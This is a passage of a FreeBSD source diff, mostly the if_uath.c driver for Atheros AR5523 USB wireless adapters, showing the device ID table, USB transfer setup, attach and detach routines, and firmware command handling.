run_delay(struct run_softc *sc, u_int ms) { usb_pause_mtx(mtx_owned(&sc->sc_mtx) ? &sc->sc_mtx : NULL, USB_MS_TO_TICKS(ms)); } static device_method_t run_methods[] = { /* Device interface */ DEVMETHOD(device_probe, run_match), DEVMETHOD(device_attach, run_attach), DEVMETHOD(device_detach, run_detach), DEVMETHOD_END }; static driver_t run_driver = { .name = "run", .methods = run_methods, .size = sizeof(struct run_softc) }; static devclass_t run_devclass; DRIVER_MODULE(run, uhub, run_driver, run_devclass, run_driver_loaded, NULL); MODULE_DEPEND(run, wlan, 1, 1, 1); MODULE_DEPEND(run, usb, 1, 1, 1); MODULE_DEPEND(run, firmware, 1, 1, 1); MODULE_VERSION(run, 1); diff --git a/sys/dev/usb/wlan/if_uath.c b/sys/dev/usb/wlan/if_uath.c index 3645d180997f..9db1e04ce3de 100644 --- a/sys/dev/usb/wlan/if_uath.c +++ b/sys/dev/usb/wlan/if_uath.c @@ -1,2909 +1,2909 @@ /*- * Copyright (c) 2006 Sam Leffler, Errno Consulting * Copyright (c) 2008-2009 Weongyo Jeong * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. 
Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ /* * This driver is distantly derived from a driver of the same name * by Damien Bergamini. The original copyright is included below: * * Copyright (c) 2006 * Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Driver for Atheros AR5523 USB parts. * * The driver requires firmware to be loaded into the device. This * is done on device discovery from a user application (uathload) * that is launched by devd when a device with suitable product ID * is recognized. Once firmware has been loaded the device will * reset the USB port and re-attach with the original product ID+1 * and this driver will be attached. The firmware is licensed for * general use (royalty free) and may be incorporated in products. * Note that the firmware normally packaged with the NDIS drivers * for these devices does not work in this way and so does not work * with this driver. 
*/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include "usbdevs.h" #include #include static SYSCTL_NODE(_hw_usb, OID_AUTO, uath, CTLFLAG_RW, 0, "USB Atheros"); static int uath_countrycode = CTRY_DEFAULT; /* country code */ SYSCTL_INT(_hw_usb_uath, OID_AUTO, countrycode, CTLFLAG_RW | CTLFLAG_TUN, &uath_countrycode, 0, "country code"); TUNABLE_INT("hw.usb.uath.countrycode", &uath_countrycode); static int uath_regdomain = 0; /* regulatory domain */ SYSCTL_INT(_hw_usb_uath, OID_AUTO, regdomain, CTLFLAG_RD, &uath_regdomain, 0, "regulatory domain"); #ifdef UATH_DEBUG int uath_debug = 0; SYSCTL_INT(_hw_usb_uath, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_TUN, &uath_debug, 0, "uath debug level"); TUNABLE_INT("hw.usb.uath.debug", &uath_debug); enum { UATH_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ UATH_DEBUG_XMIT_DUMP = 0x00000002, /* xmit dump */ UATH_DEBUG_RECV = 0x00000004, /* basic recv operation */ UATH_DEBUG_TX_PROC = 0x00000008, /* tx ISR proc */ UATH_DEBUG_RX_PROC = 0x00000010, /* rx ISR proc */ UATH_DEBUG_RECV_ALL = 0x00000020, /* trace all frames (beacons) */ UATH_DEBUG_INIT = 0x00000040, /* initialization of dev */ UATH_DEBUG_DEVCAP = 0x00000080, /* dev caps */ UATH_DEBUG_CMDS = 0x00000100, /* commands */ UATH_DEBUG_CMDS_DUMP = 0x00000200, /* command buffer dump */ UATH_DEBUG_RESET = 0x00000400, /* reset processing */ UATH_DEBUG_STATE = 0x00000800, /* 802.11 state transitions */ UATH_DEBUG_MULTICAST = 0x00001000, /* multicast */ UATH_DEBUG_WME = 0x00002000, /* WME */ UATH_DEBUG_CHANNEL = 0x00004000, /* channel */ UATH_DEBUG_RATES = 0x00008000, /* rates */ UATH_DEBUG_CRYPTO = 0x00010000, /* crypto */ UATH_DEBUG_LED = 0x00020000, /* LED */ UATH_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) 
do { \ (void) sc; \ } while (0) #endif /* unaligned little endian access */ #define LE_READ_2(p) \ ((u_int16_t) \ ((((u_int8_t *)(p))[0] ) | (((u_int8_t *)(p))[1] << 8))) #define LE_READ_4(p) \ ((u_int32_t) \ ((((u_int8_t *)(p))[0] ) | (((u_int8_t *)(p))[1] << 8) | \ (((u_int8_t *)(p))[2] << 16) | (((u_int8_t *)(p))[3] << 24))) /* recognized device vendors/products */ static const STRUCT_USB_HOST_ID uath_devs[] = { #define UATH_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } UATH_DEV(ACCTON, SMCWUSBTG2), UATH_DEV(ATHEROS, AR5523), UATH_DEV(ATHEROS2, AR5523_1), UATH_DEV(ATHEROS2, AR5523_2), UATH_DEV(ATHEROS2, AR5523_3), UATH_DEV(CONCEPTRONIC, AR5523_1), UATH_DEV(CONCEPTRONIC, AR5523_2), UATH_DEV(DLINK, DWLAG122), UATH_DEV(DLINK, DWLAG132), UATH_DEV(DLINK, DWLG132), UATH_DEV(DLINK2, DWA120), UATH_DEV(GIGASET, AR5523), UATH_DEV(GIGASET, SMCWUSBTG), UATH_DEV(GLOBALSUN, AR5523_1), UATH_DEV(GLOBALSUN, AR5523_2), UATH_DEV(NETGEAR, WG111U), UATH_DEV(NETGEAR3, WG111T), UATH_DEV(NETGEAR3, WPN111), UATH_DEV(NETGEAR3, WPN111_2), UATH_DEV(UMEDIA, TEW444UBEU), UATH_DEV(UMEDIA, AR5523_2), UATH_DEV(WISTRONNEWEB, AR5523_1), UATH_DEV(WISTRONNEWEB, AR5523_2), UATH_DEV(ZCOM, AR5523) #undef UATH_DEV }; static usb_callback_t uath_intr_rx_callback; static usb_callback_t uath_intr_tx_callback; static usb_callback_t uath_bulk_rx_callback; static usb_callback_t uath_bulk_tx_callback; static const struct usb_config uath_usbconfig[UATH_N_XFERS] = { [UATH_INTR_RX] = { .type = UE_BULK, .endpoint = 0x1, .direction = UE_DIR_IN, .bufsize = UATH_MAX_CMDSZ, .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = uath_intr_rx_callback }, [UATH_INTR_TX] = { .type = UE_BULK, .endpoint = 0x1, .direction = UE_DIR_OUT, .bufsize = UATH_MAX_CMDSZ * UATH_CMD_LIST_COUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1, }, .callback = uath_intr_tx_callback, .timeout = UATH_CMD_TIMEOUT }, [UATH_BULK_RX] = { .type = UE_BULK, .endpoint = 0x2, .direction = UE_DIR_IN, .bufsize = MCLBYTES, .flags = { .ext_buffer = 1, .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = uath_bulk_rx_callback }, [UATH_BULK_TX] = { .type = UE_BULK, .endpoint = 0x2, .direction = UE_DIR_OUT, .bufsize = UATH_MAX_TXBUFSZ * UATH_TX_DATA_LIST_COUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1 }, .callback = uath_bulk_tx_callback, .timeout = UATH_DATA_TIMEOUT } }; static struct ieee80211vap *uath_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void uath_vap_delete(struct ieee80211vap *); static int uath_alloc_cmd_list(struct uath_softc *, struct uath_cmd []); static void uath_free_cmd_list(struct uath_softc *, struct uath_cmd []); static int uath_host_available(struct uath_softc *); static int uath_get_capability(struct uath_softc *, uint32_t, uint32_t *); static int uath_get_devcap(struct uath_softc *); static struct uath_cmd * uath_get_cmdbuf(struct uath_softc *); static int uath_cmd_read(struct uath_softc *, uint32_t, const void *, int, void *, int, int); static int uath_cmd_write(struct uath_softc *, uint32_t, const void *, int, int); static void uath_stat(void *); #ifdef UATH_DEBUG static void uath_dump_cmd(const uint8_t *, int, char); static const char * uath_codename(int); #endif static int uath_get_devstatus(struct uath_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static int uath_get_status(struct uath_softc *, uint32_t, void *, int); static int uath_alloc_rx_data_list(struct uath_softc *); static int 
uath_alloc_tx_data_list(struct uath_softc *); static void uath_free_rx_data_list(struct uath_softc *); static void uath_free_tx_data_list(struct uath_softc *); static int uath_init_locked(void *); static void uath_init(void *); static void uath_stop_locked(struct ifnet *); static void uath_stop(struct ifnet *); static int uath_ioctl(struct ifnet *, u_long, caddr_t); static void uath_start(struct ifnet *); static int uath_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void uath_scan_start(struct ieee80211com *); static void uath_scan_end(struct ieee80211com *); static void uath_set_channel(struct ieee80211com *); static void uath_update_mcast(struct ifnet *); static void uath_update_promisc(struct ifnet *); static int uath_config(struct uath_softc *, uint32_t, uint32_t); static int uath_config_multi(struct uath_softc *, uint32_t, const void *, int); static int uath_switch_channel(struct uath_softc *, struct ieee80211_channel *); static int uath_set_rxfilter(struct uath_softc *, uint32_t, uint32_t); static void uath_watchdog(void *); static void uath_abort_xfers(struct uath_softc *); static int uath_dataflush(struct uath_softc *); static int uath_cmdflush(struct uath_softc *); static int uath_flush(struct uath_softc *); static int uath_set_ledstate(struct uath_softc *, int); static int uath_set_chan(struct uath_softc *, struct ieee80211_channel *); static int uath_reset_tx_queues(struct uath_softc *); static int uath_wme_init(struct uath_softc *); static struct uath_data * uath_getbuf(struct uath_softc *); static int uath_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int uath_set_key(struct uath_softc *, const struct ieee80211_key *, int); static int uath_set_keys(struct uath_softc *, struct ieee80211vap *); static void uath_sysctl_node(struct uath_softc *); static int uath_match(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != UATH_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != UATH_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(uath_devs, sizeof(uath_devs), uaa)); } static int uath_attach(device_t dev) { struct uath_softc *sc = device_get_softc(dev); struct usb_attach_arg *uaa = device_get_ivars(dev); struct ieee80211com *ic; struct ifnet *ifp; uint8_t bands, iface_index = UATH_IFACE_INDEX; /* XXX */ usb_error_t error; uint8_t macaddr[IEEE80211_ADDR_LEN]; sc->sc_dev = dev; sc->sc_udev = uaa->device; #ifdef UATH_DEBUG sc->sc_debug = uath_debug; #endif device_set_usb_desc(dev); /* * Only post-firmware devices here. */ mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); callout_init(&sc->stat_ch, 0); callout_init_mtx(&sc->watchdog_ch, &sc->sc_mtx, 0); error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, uath_usbconfig, UATH_N_XFERS, sc, &sc->sc_mtx); if (error) { device_printf(dev, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto fail; } sc->sc_cmd_dma_buf = usbd_xfer_get_frame_buffer(sc->sc_xfer[UATH_INTR_TX], 0); sc->sc_tx_dma_buf = usbd_xfer_get_frame_buffer(sc->sc_xfer[UATH_BULK_TX], 0); /* * Setup buffers for firmware commands. */ error = uath_alloc_cmd_list(sc, sc->sc_cmd); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx command list\n"); goto fail1; } /* * We're now ready to send+receive firmware commands. 
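* uath_host_available() announces the host driver to the firmware and uath_get_devcap() retrieves the device capability list; both must succeed before the ifnet is created below.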
*/ UATH_LOCK(sc); error = uath_host_available(sc); if (error != 0) { device_printf(sc->sc_dev, "could not initialize adapter\n"); goto fail3; } error = uath_get_devcap(sc); if (error != 0) { device_printf(sc->sc_dev, "could not get device capabilities\n"); goto fail3; } UATH_UNLOCK(sc); /* Create device sysctl node. */ uath_sysctl_node(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not allocate ifnet\n"); error = ENXIO; goto fail2; } UATH_LOCK(sc); error = uath_get_devstatus(sc, macaddr); if (error != 0) { device_printf(sc->sc_dev, "could not get device status\n"); goto fail4; } /* * Allocate xfers for Rx/Tx data pipes. */ error = uath_alloc_rx_data_list(sc); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Rx data list\n"); goto fail4; } error = uath_alloc_tx_data_list(sc); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx data list\n"); goto fail4; } UATH_UNLOCK(sc); ifp->if_softc = sc; if_initname(ifp, "uath", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = uath_init; ifp->if_ioctl = uath_ioctl; ifp->if_start = uath_start; /* XXX UATH_TX_DATA_LIST_COUNT */ IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA | /* station mode */ IEEE80211_C_MONITOR | /* monitor mode supported */ IEEE80211_C_TXPMGT | /* tx power management */ IEEE80211_C_SHPREAMBLE | /* short preamble supported */ IEEE80211_C_SHSLOT | /* short slot time supported */ IEEE80211_C_WPA | /* 802.11i */ IEEE80211_C_BGSCAN | /* capable of bg scanning */ IEEE80211_C_TXFRAG; /* handle tx frags */ /* put a regulatory domain to reveal informations. 
*/ uath_regdomain = sc->sc_devcap.regDomain; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if ((sc->sc_devcap.analog5GhzRevision & 0xf0) == 0x30) setbit(&bands, IEEE80211_MODE_11A); /* XXX turbo */ ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); ic->ic_raw_xmit = uath_raw_xmit; ic->ic_scan_start = uath_scan_start; ic->ic_scan_end = uath_scan_end; ic->ic_set_channel = uath_set_channel; ic->ic_vap_create = uath_vap_create; ic->ic_vap_delete = uath_vap_delete; ic->ic_update_mcast = uath_update_mcast; ic->ic_update_promisc = uath_update_promisc; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), UATH_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), UATH_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); fail4: if_free(ifp); fail3: UATH_UNLOCK(sc); fail2: uath_free_cmd_list(sc, sc->sc_cmd); fail1: usbd_transfer_unsetup(sc->sc_xfer, UATH_N_XFERS); fail: return (error); } static int uath_detach(device_t dev) { struct uath_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; unsigned int x; /* * Prevent further allocations from RX/TX/CMD * data lists and ioctls */ UATH_LOCK(sc); sc->sc_flags |= UATH_FLAG_INVALID; STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); STAILQ_INIT(&sc->sc_cmd_active); STAILQ_INIT(&sc->sc_cmd_pending); STAILQ_INIT(&sc->sc_cmd_waiting); STAILQ_INIT(&sc->sc_cmd_inactive); UATH_UNLOCK(sc); uath_stop(ifp); callout_drain(&sc->stat_ch); callout_drain(&sc->watchdog_ch); /* drain USB transfers */ for (x = 0; x != UATH_N_XFERS; x++) usbd_transfer_drain(sc->sc_xfer[x]); /* free data buffers */ UATH_LOCK(sc); uath_free_rx_data_list(sc); uath_free_tx_data_list(sc); uath_free_cmd_list(sc, sc->sc_cmd); UATH_UNLOCK(sc); /* free USB transfers and some data buffers */ usbd_transfer_unsetup(sc->sc_xfer, UATH_N_XFERS); ieee80211_ifdetach(ic); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static void uath_free_cmd_list(struct uath_softc *sc, struct uath_cmd cmds[]) { int i; for (i = 0; i != UATH_CMD_LIST_COUNT; i++) cmds[i].buf = NULL; } static int uath_alloc_cmd_list(struct uath_softc *sc, struct uath_cmd cmds[]) { int i; STAILQ_INIT(&sc->sc_cmd_active); STAILQ_INIT(&sc->sc_cmd_pending); STAILQ_INIT(&sc->sc_cmd_waiting); STAILQ_INIT(&sc->sc_cmd_inactive); for (i = 0; i != UATH_CMD_LIST_COUNT; i++) { struct uath_cmd *cmd = &cmds[i]; cmd->sc = sc; /* backpointer for callbacks */ cmd->msgid = i; cmd->buf = ((uint8_t *)sc->sc_cmd_dma_buf) + (i * UATH_MAX_CMDSZ); STAILQ_INSERT_TAIL(&sc->sc_cmd_inactive, cmd, next); UATH_STAT_INC(sc, st_cmd_inactive); } return (0); } static int uath_host_available(struct uath_softc *sc) { struct uath_cmd_host_available setup; UATH_ASSERT_LOCKED(sc); /* inform target the host is available */ setup.sw_ver_major = htobe32(ATH_SW_VER_MAJOR); setup.sw_ver_minor = htobe32(ATH_SW_VER_MINOR); setup.sw_ver_patch = htobe32(ATH_SW_VER_PATCH); setup.sw_ver_build = htobe32(ATH_SW_VER_BUILD); return uath_cmd_read(sc, WDCMSG_HOST_AVAILABLE, &setup, sizeof setup, NULL, 0, 0); } #ifdef UATH_DEBUG static void uath_dump_cmd(const uint8_t *buf, int len, char prefix) { const char *sep = ""; int i; for (i = 0; i < len; i++) { if ((i % 16) == 0) { printf("%s%c ", sep, prefix); sep = "\n"; } else if ((i % 4) == 0) printf(" "); printf("%02x", buf[i]); } printf("\n"); } static const 
char * uath_codename(int code) { #define N(a) (sizeof(a)/sizeof(a[0])) static const char *names[] = { "0x00", "HOST_AVAILABLE", "BIND", "TARGET_RESET", "TARGET_GET_CAPABILITY", "TARGET_SET_CONFIG", "TARGET_GET_STATUS", "TARGET_GET_STATS", "TARGET_START", "TARGET_STOP", "TARGET_ENABLE", "TARGET_DISABLE", "CREATE_CONNECTION", "UPDATE_CONNECT_ATTR", "DELETE_CONNECT", "SEND", "FLUSH", "STATS_UPDATE", "BMISS", "DEVICE_AVAIL", "SEND_COMPLETE", "DATA_AVAIL", "SET_PWR_MODE", "BMISS_ACK", "SET_LED_STEADY", "SET_LED_BLINK", "SETUP_BEACON_DESC", "BEACON_INIT", "RESET_KEY_CACHE", "RESET_KEY_CACHE_ENTRY", "SET_KEY_CACHE_ENTRY", "SET_DECOMP_MASK", "SET_REGULATORY_DOMAIN", "SET_LED_STATE", "WRITE_ASSOCID", "SET_STA_BEACON_TIMERS", "GET_TSF", "RESET_TSF", "SET_ADHOC_MODE", "SET_BASIC_RATE", "MIB_CONTROL", "GET_CHANNEL_DATA", "GET_CUR_RSSI", "SET_ANTENNA_SWITCH", "0x2c", "0x2d", "0x2e", "USE_SHORT_SLOT_TIME", "SET_POWER_MODE", "SETUP_PSPOLL_DESC", "SET_RX_MULTICAST_FILTER", "RX_FILTER", "PER_CALIBRATION", "RESET", "DISABLE", "PHY_DISABLE", "SET_TX_POWER_LIMIT", "SET_TX_QUEUE_PARAMS", "SETUP_TX_QUEUE", "RELEASE_TX_QUEUE", }; static char buf[8]; if (code < N(names)) return names[code]; if (code == WDCMSG_SET_DEFAULT_KEY) return "SET_DEFAULT_KEY"; snprintf(buf, sizeof(buf), "0x%02x", code); return buf; #undef N } #endif /* * Low-level function to send read or write commands to the firmware. */ static int uath_cmdsend(struct uath_softc *sc, uint32_t code, const void *idata, int ilen, void *odata, int olen, int flags) { struct uath_cmd_hdr *hdr; struct uath_cmd *cmd; int error; UATH_ASSERT_LOCKED(sc); /* grab a xfer */ cmd = uath_get_cmdbuf(sc); if (cmd == NULL) { device_printf(sc->sc_dev, "%s: empty inactive queue\n", __func__); return (ENOBUFS); } cmd->flags = flags; /* always bulk-out a multiple of 4 bytes */ cmd->buflen = roundup2(sizeof(struct uath_cmd_hdr) + ilen, 4); hdr = (struct uath_cmd_hdr *)cmd->buf; memset(hdr, 0, sizeof(struct uath_cmd_hdr)); hdr->len = htobe32(cmd->buflen); hdr->code = htobe32(code); hdr->msgid = cmd->msgid; /* don't care about endianness */ hdr->magic = htobe32((cmd->flags & UATH_CMD_FLAG_MAGIC) ? 
1 << 24 : 0); memcpy((uint8_t *)(hdr + 1), idata, ilen); #ifdef UATH_DEBUG if (sc->sc_debug & UATH_DEBUG_CMDS) { printf("%s: send %s [flags 0x%x] olen %d\n", __func__, uath_codename(code), cmd->flags, olen); if (sc->sc_debug & UATH_DEBUG_CMDS_DUMP) uath_dump_cmd(cmd->buf, cmd->buflen, '+'); } #endif cmd->odata = odata; KASSERT(odata == NULL || olen < UATH_MAX_CMDSZ - sizeof(*hdr) + sizeof(uint32_t), ("odata %p olen %u", odata, olen)); cmd->olen = olen; STAILQ_INSERT_TAIL(&sc->sc_cmd_pending, cmd, next); UATH_STAT_INC(sc, st_cmd_pending); usbd_transfer_start(sc->sc_xfer[UATH_INTR_TX]); if (cmd->flags & UATH_CMD_FLAG_READ) { usbd_transfer_start(sc->sc_xfer[UATH_INTR_RX]); /* wait at most two seconds for command reply */ error = mtx_sleep(cmd, &sc->sc_mtx, 0, "uathcmd", 2 * hz); cmd->odata = NULL; /* in case reply comes too late */ if (error != 0) { device_printf(sc->sc_dev, "timeout waiting for reply " "to cmd 0x%x (%u)\n", code, code); } else if (cmd->olen != olen) { device_printf(sc->sc_dev, "unexpected reply data count " "to cmd 0x%x (%u), got %u, expected %u\n", code, code, cmd->olen, olen); error = EINVAL; } return (error); } return (0); } static int uath_cmd_read(struct uath_softc *sc, uint32_t code, const void *idata, int ilen, void *odata, int olen, int flags) { flags |= UATH_CMD_FLAG_READ; return uath_cmdsend(sc, code, idata, ilen, odata, olen, flags); } static int uath_cmd_write(struct uath_softc *sc, uint32_t code, const void *data, int len, int flags) { flags &= ~UATH_CMD_FLAG_READ; return uath_cmdsend(sc, code, data, len, NULL, 0, flags); } static struct uath_cmd * uath_get_cmdbuf(struct uath_softc *sc) { struct uath_cmd *uc; UATH_ASSERT_LOCKED(sc); uc = STAILQ_FIRST(&sc->sc_cmd_inactive); if (uc != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_cmd_inactive, next); UATH_STAT_DEC(sc, st_cmd_inactive); } else uc = NULL; if (uc == NULL) DPRINTF(sc, UATH_DEBUG_XMIT, "%s: %s\n", __func__, "out of command xmit buffers"); return (uc); } /* * This function is called periodically (every second) when associated to * query device statistics. */ static void uath_stat(void *arg) { struct uath_softc *sc = arg; int error; UATH_LOCK(sc); /* * Send request for statistics asynchronously. The timer will be * restarted when we'll get the stats notification. 
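* (uath_cmdeof() re-arms stat_ch when the WDCMSG_TARGET_GET_STATS notification is processed.)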
*/ error = uath_cmd_write(sc, WDCMSG_TARGET_GET_STATS, NULL, 0, UATH_CMD_FLAG_ASYNC); if (error != 0) { device_printf(sc->sc_dev, "could not query stats, error %d\n", error); } UATH_UNLOCK(sc); } static int uath_get_capability(struct uath_softc *sc, uint32_t cap, uint32_t *val) { int error; cap = htobe32(cap); error = uath_cmd_read(sc, WDCMSG_TARGET_GET_CAPABILITY, &cap, sizeof cap, val, sizeof(uint32_t), UATH_CMD_FLAG_MAGIC); if (error != 0) { device_printf(sc->sc_dev, "could not read capability %u\n", be32toh(cap)); return (error); } *val = be32toh(*val); return (error); } static int uath_get_devcap(struct uath_softc *sc) { #define GETCAP(x, v) do { \ error = uath_get_capability(sc, x, &v); \ if (error != 0) \ return (error); \ DPRINTF(sc, UATH_DEBUG_DEVCAP, \ "%s: %s=0x%08x\n", __func__, #x, v); \ } while (0) struct uath_devcap *cap = &sc->sc_devcap; int error; /* collect device capabilities */ GETCAP(CAP_TARGET_VERSION, cap->targetVersion); GETCAP(CAP_TARGET_REVISION, cap->targetRevision); GETCAP(CAP_MAC_VERSION, cap->macVersion); GETCAP(CAP_MAC_REVISION, cap->macRevision); GETCAP(CAP_PHY_REVISION, cap->phyRevision); GETCAP(CAP_ANALOG_5GHz_REVISION, cap->analog5GhzRevision); GETCAP(CAP_ANALOG_2GHz_REVISION, cap->analog2GhzRevision); GETCAP(CAP_REG_DOMAIN, cap->regDomain); GETCAP(CAP_REG_CAP_BITS, cap->regCapBits); #if 0 /* NB: not supported in rev 1.5 */ GETCAP(CAP_COUNTRY_CODE, cap->countryCode); #endif GETCAP(CAP_WIRELESS_MODES, cap->wirelessModes); GETCAP(CAP_CHAN_SPREAD_SUPPORT, cap->chanSpreadSupport); GETCAP(CAP_COMPRESS_SUPPORT, cap->compressSupport); GETCAP(CAP_BURST_SUPPORT, cap->burstSupport); GETCAP(CAP_FAST_FRAMES_SUPPORT, cap->fastFramesSupport); GETCAP(CAP_CHAP_TUNING_SUPPORT, cap->chapTuningSupport); GETCAP(CAP_TURBOG_SUPPORT, cap->turboGSupport); GETCAP(CAP_TURBO_PRIME_SUPPORT, cap->turboPrimeSupport); GETCAP(CAP_DEVICE_TYPE, cap->deviceType); GETCAP(CAP_WME_SUPPORT, cap->wmeSupport); GETCAP(CAP_TOTAL_QUEUES, cap->numTxQueues); GETCAP(CAP_CONNECTION_ID_MAX, cap->connectionIdMax); GETCAP(CAP_LOW_5GHZ_CHAN, cap->low5GhzChan); GETCAP(CAP_HIGH_5GHZ_CHAN, cap->high5GhzChan); GETCAP(CAP_LOW_2GHZ_CHAN, cap->low2GhzChan); GETCAP(CAP_HIGH_2GHZ_CHAN, cap->high2GhzChan); GETCAP(CAP_TWICE_ANTENNAGAIN_5G, cap->twiceAntennaGain5G); GETCAP(CAP_TWICE_ANTENNAGAIN_2G, cap->twiceAntennaGain2G); GETCAP(CAP_CIPHER_AES_CCM, cap->supportCipherAES_CCM); GETCAP(CAP_CIPHER_TKIP, cap->supportCipherTKIP); GETCAP(CAP_MIC_TKIP, cap->supportMicTKIP); cap->supportCipherWEP = 1; /* NB: always available */ return (0); } static int uath_get_devstatus(struct uath_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { int error; /* retrieve MAC address */ error = uath_get_status(sc, ST_MAC_ADDR, macaddr, IEEE80211_ADDR_LEN); if (error != 0) { device_printf(sc->sc_dev, "could not read MAC address\n"); return (error); } error = uath_get_status(sc, ST_SERIAL_NUMBER, &sc->sc_serial[0], sizeof(sc->sc_serial)); if (error != 0) { device_printf(sc->sc_dev, "could not read device serial number\n"); return (error); } return (0); } static int uath_get_status(struct uath_softc *sc, uint32_t which, void *odata, int olen) { int error; which = htobe32(which); error = uath_cmd_read(sc, WDCMSG_TARGET_GET_STATUS, &which, sizeof(which), odata, olen, UATH_CMD_FLAG_MAGIC); if (error != 0) device_printf(sc->sc_dev, "could not read EEPROM offset 0x%02x\n", be32toh(which)); return (error); } static void uath_free_data_list(struct uath_softc *sc, struct uath_data data[], int ndata, int fillmbuf) { int i; for (i = 0; i < ndata; i++) { 
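/* Rx entries own their mbuf cluster while Tx entries only point into the shared DMA buffer, so only free the mbuf when fillmbuf is set. */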
